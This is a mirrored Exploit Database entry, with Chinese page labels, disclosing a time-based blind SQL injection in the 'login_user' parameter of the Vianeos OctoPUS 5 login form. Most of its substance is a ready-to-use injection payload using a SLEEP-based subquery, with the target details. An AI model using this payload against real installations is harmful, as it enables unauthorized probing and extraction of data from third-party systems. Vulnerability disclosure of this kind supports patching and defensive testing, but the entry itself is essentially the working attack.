Vianeos OctoPUS 5 – ‘login_user’ SQLi

• Exploit Database
• 146 阅读

• 作者： Audencia Business SCHOOL Red Team
  日期： 2021-07-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50078/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  # Exploit Title: Vianeos OctoPUS 5 - &apos;login_user&apos; SQLi # Date: 01/07/2021 # Exploit Author: Audencia Business SCHOOL # Vendor Homepage: http://www.vianeos.com/en/home-vianeos/ # Software Link: http://www.vianeos.com/en/octopus/ # Version: > V5 # Tested on: Fedora / Apache2 / MariaDB     Octopus V5 SQLi   The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow : </code><code> Parameter: login_user (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: signin_user=1&login_user=1&apos; AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND &apos;OoKG&apos;=&apos;OoKG&password_user=1 </code><code>